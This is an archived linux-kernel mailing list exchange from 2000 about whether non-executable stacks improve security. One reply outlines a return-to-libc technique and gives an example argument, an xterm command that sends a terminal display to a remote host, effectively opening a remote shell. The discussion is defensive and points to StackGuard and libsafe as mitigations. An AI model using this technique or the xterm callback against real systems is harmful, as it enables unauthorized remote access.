Igmar Palsenberg <maillist@chello.nl> writes:
> >
> > non executable stack give, as it was said before, a false sence of security;
>
> I agree. Although it makes the life on someone who wants to get in a bit
> harder..
>
> > also, the majority of recent exploit work on non exec stack as it is, at least,
> > as easy to write an exploit for non executable as for executable stack.
>
> Is it ?? Lots of exploits abuse the fact that you can push some code on
> the stack, and that get's executed.. If you can't make that move, it makes
> the job a bit harder..
check http://www.uwsg.indiana.edu/hypermail/linux/kernel/0004.2/0446.html
In short,
Just smash the stack so the function return to the system() system call
with the parameter pointing at whatever string ( for exemple :
/usr/X11R6/bin/xterm -d x.x.x.x:0.0 )
>
> > So it will not even work on short term.
>
> Restricting the power of root I think is some nice way to make a
> start.. The main goals is still making userland apps secure.
So, use userspace apps to do that, ie : stackguard / libsafe.
--
-- Yoann, http://www.mandrakesoft.com/~yoann/
It is well known that M$ products don't call free() after a malloc().
The Unix community wish them good luck for their future developments.
-
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to majordomo@vger.rutgers.edu
Please read the FAQ at http://www.tux.org/lkml/
This archive was generated by hypermail 2b29 : Mon May 15 2000 - 21:00:13 EST